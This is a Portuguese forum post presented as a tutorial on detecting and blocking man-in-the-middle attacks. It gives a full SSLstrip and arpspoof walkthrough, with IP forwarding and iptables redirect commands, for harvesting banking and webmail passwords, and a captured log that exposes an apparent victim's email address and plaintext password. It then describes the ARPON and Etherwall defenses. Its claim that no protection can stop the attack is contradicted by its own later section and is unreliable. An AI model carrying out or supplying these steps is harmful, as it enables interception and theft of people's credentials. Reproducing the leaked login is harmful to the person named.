Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Detectar e bloquear ataques Man in The Middle

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Detectar e bloquear ataques Man in The Middle

    Detectar e bloquear ataques Man in The Middle


    Sslstrip e man-in-the-middle, SSL seguro?
    Gustavo Lima+ em 28/07/11 às 2:47 pm

    No início desta semana, eu discuti sobre segurança dentro de um Hotel em Vitória. A Outra pessoa teimava em dizer que quando qualquer um acessa um site seguro, com SSL/Certificado digital, nenhum hacker/cracker poderia roubar os seus dados. Eu argumentei que não era bem assim e que há técnicas que possibilitam o roubo de dados, mesmo navegando em sites seguros – SSL.
    Eis que o o blog unknownantisec fez um excelente post explicando como executar um ataque Man in the middle em conjunto com a ferramenta SSLstrip, a qual já foi comentada várias vezes no blog.
    Apesar de ser uma técnica relativamente fácil de ser feita, não deixa de ser uma técnica super poderosa. Muitos crackers à usam para fins maléficos como roubar senhas de clientes de bancos, mas a mesma pode ser usada por hackers para descobrir senhas de e-mails como por exemplo o Yahoo! Ou Hotmail que se tentássemos captura-las por técnicas de sniffing não obteríamos nada legível. Neste artigo irei mostrar como os crackers capturam senhas de bancos on-line para demonstrar que os famosos tecladinhos virtuais são facilmente burlados apesar de toda a sua fama de seguro. Nenhuma forma de proteção existente nos dias de hoje é capaz de parar esta técnica.
    Como funciona?

    Veja a imagem a seguir, esta é uma representação de uma conexão normal, sem interceptações, e funciona de modo que o cliente passa os dados criptografados para o servidor e vice-versa, tornando assim impossível o uso de técnicas de sniffing para a capturados dados trocados entre o cliente e o servidor.


    Abaixo segue uma representação de uma conexão interceptada, (usando a técnica Man-in-The-Middle), e funciona de modo que o hacker engana o cliente e o servidor. Engana o cliente se fazendo passar por um simples servidor de proxy, e engana o servidor se passando pelo próprio cliente, desta forma os dados chegam até o hacker em texto puro, pois os dois pensam que o hacker é uma fonte confiável.


    (Fonte: securityhacker)

    ================================================== ========

    Como é feito o ataque

    para isso entre no diretorio do sslstrip:
    Código HTML:
    #cd /pentest/web/sslstrip
    Agora vamos listar as opções do sslstrip:
    Código HTML:
    #python sslstrip.py -h
    Ele vai dar as seguintes opções:
    Código HTML:
    sslstrip 0.8 by Moxie Marlinspike
    Usage: sslstrip <options>
    
    Options:
    -w <filename>, --write=<filename> Specify file to log to (optional).
    -p , --post                       Log only SSL POSTs. (default)
    -s , --ssl                        Log all SSL traffic to and from server.
    -a , --all                        Log all SSL and HTTP traffic to and from server.
    -l <port>, --listen=<port>        Port to listen on (default 10000).
    -f , --favicon                    Substitute a lock favicon on secure requests.
    -k , --killsessions               Kill sessions in progress.
    -h                                Print this help message.
    Vamos usar a opção “-w” ou “–write=” para gravar os logs em um arquivo e a “-l” ou “–listen=” para listar a porta de escuta.

    Primeiro vamos habilitar ip forward no computador, para que ele possa intender que queremos redirecionar o trafego.

    Código HTML:
    echo "1" > /proc/sys/net/ipv4/ip_forward
    Agora vamos redirecionar o tráfego da porta 80 para a 10000 que é onde o sslstrip vai trabalhar.

    Código HTML:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    Vamos colocar o sslstrip para funcionar agora, digite no terminal:

    Código HTML:
    #python sslstrip.py -w trafego -l 10000
    Abra outro terminal ou pagina que vamos colocar o arpspoof para funcionar.

    Assim que abrir o terminal, digite route para saber qual o seu roteador e qual a placa que está conectada, ficaria assim.
    Código HTML:
    Kernel IP routing table
    Destination    Gateway                  Genmask         Flags Metric Ref    Use Iface
    10.0.0.0           *                    255.0.0.0       U     0      0      0   eth0
    default        10.25.77.254             0.0.0.0         UG    0      0      0   e
    Ficando assim:
    10.25.77.254 é seu router
    eth0 é sua placa de rede

    Sabendo o que é o que, vamos executar o arpspoof, digite no terminal
    Código HTML:
    #arpspoof -i eth0 10.25.77.254
    Para ver as “senhas” basta digitar:
    Código:
    #less trafego
    Agora é só garimpar as senhas recolhidas.

    Exemplo de pacote capturado

    Código HTML:
    2011-07-28 13:49:19,605 SECURE POST Data (login.live.com):
    login=juana%40hotmail.com&passwd=loa1814&type=11&LoginOptions=3&NewUser=1&MEST=&PPSX=PassportRN&PPFT=CSunM4mofYhigqiObttRmtoFdxf8alO7UBN1O9Jb2EQYF1T5sE4qGl
    teBPzjSYo1kd1jAsP7rlt80UdeEqjMeasL5WXvuVU%21n8NSpKRq3NxmBsw06rOBOfPnz4pejvv3qm0x7rcejM0zU0oCmtF9mL1UqTYa0VQELVDpWOg3RhYACZhXqKYJAbxteyPX%21Mr1Yrq*Un8yDSMnbAgENcljztLVOk
    *y&idsbho=1&PwdPad=&sso=&i1=&i2=1&i3=19972&i4=&i12=1&i13=&i14=593&i15=1038
    Email: juana@hotmail.com
    Senha:loa1814

    Evitando o Ataque

    Ferramentas

    ARPON

    O que é ARPON?

    ARPON ( ARP inspeção manipulador ) é um daemon manipulador portátil que fazer protocolo ARP seguro, a fim de evitar o Man In The Middle (MITM) ataque através de ARP Spoofing , ARP Poisoning Cache ou ARP veneno Routing (APR) ataques. Ele bloqueia também os ataques derivados por isso, que Sniffing, Sequestro, Injection, Filtragem e ataques de colegas para mais ataques derivados complexos, como: DNS Spoofing , WEB Spoofing , Session Hijacking e SSL / TLS Hijacking . & ataques co Isto é possível usando três tipos de anti tecnicas ARP spoofing: a primeira é baseada em Sarpi ou "Static ARP Inspection" em redes configuradas estaticamente sem DHCP, o segundo em DARPI ou "Dynamic ARP Inspection" em redes configuradas de forma dinâmica com DHCP, o terceiro em HARPI ou "híbrido ARP Inspection " em "redes híbridas", que está em estática e dinamicamente (DHCP) redes configuradas em conjunto. ARPON é, portanto, um pró-ativa Point-to-Point , Ponto-a-Multiponto e Multiponto solução baseada que requer um daemon em cada série de a conexão para autenticar cada host através de uma autenticação do tipo de cooperação entre os anfitriões e que não modifica a base protocolo padrão ARP clássico pelo IETF, mas sim define políticas precisas usando Sarpi para redes estáticas, DARPI para redes dinâmicas e HARPI para o híbrido redes de trabalho, tornando protocolo padronizado de hoje e seguro a partir de qualquer intrusão estrangeira.
    Características
    O suporte para interfaces:
    Ethernet, Wireless

    Gerencia a interface de rede com:
    Iface Desligue, Bota OS, Hibernação OS, OS Suspensão

    Solução baseada Proactive para conexões:
    Ponto-a-Ponto, Ponto-a-Multiponto, Multipoint

    Tipo de autenticação para o anfitrião:
    Cooperativa entre os hosts

    Suporte para redes:
    Estaticamente, dinamicamente (DHCP), a rede híbrida que é estática e dinamicamente

    Retro compatível com:
    ARP clássico base protocolo padrão pelo IETF

    Suporte de solicitação ARP gratuito e resposta para:
    Failover Cluster, Cluster com balanceamento de carga, alta disponibilidade (HA) Cluster

    Bloqueia o Man In The Middle (MITM) ataque por meio de:
    ARP Spoofing, ARP Poisoning Cache, ARP veneno Routing (APR)

    Três tipos de anti tecnicas ARP spoofing:
    Sarpi ou Static ARP Inspection, DARPI ou dinâmica ARP Inspection, HARPI ou híbrido ARP Inspection

    Bloqueia os ataques derivados:
    Sniffing, Sequestro, Injection, Filtragem e ataques de colegas

    Bloqueia os ataques complexos derivados:
    DNS Spoofing, WEB Spoofing, Session Hijacking, SSL / TLS Hijacking e ataques de colegas

    Testado contra:
    Ferramentas Ettercap, Cain & Abel, dsniff, Yersinia, scapy, netcut, Metasploit, arpspoof, sslsniff, sslstrip & co

    Compatível com OS


    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Fonte: arpon.sourceforge

    ================================================== ========
    Etherwall – Contra ataques Man in The Middle – MITM


    O Etherwall é uma ferramenta bem interessante que roda no mundo linux e tem a capacidade de detectar e bloquear ataques Man in The Middle executados via ARP Spoofing/Poisoning. Abixo temos uma lista de algumas de suas features:

    Daemon Processing
    ARP Packet Filtering
    Point to Point & Point to Multipoint Protection
    Realtime Protection
    System Logging
    Early Warning
    Support for networks Statically, Dynamically, or Both
    Supports for Ethernet Wired & Wireless interface (IEEE 802.3 & IEEE 802.11)
    Plugins / Tools
    Included Man Pages
    Easy to Use and Free

    Veja-o em funcionamento na imagem abaixo:


    Utilitário tem a capacidade de prevenir ataques Man-in-the-middle


    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    O diabo sabe, não porque é sábio. O diabo sabe porque é velho.

    Skype: sophos.loko

    Não preciso de convite, já faço parte da elite
    Similar Threads
X
Working...
X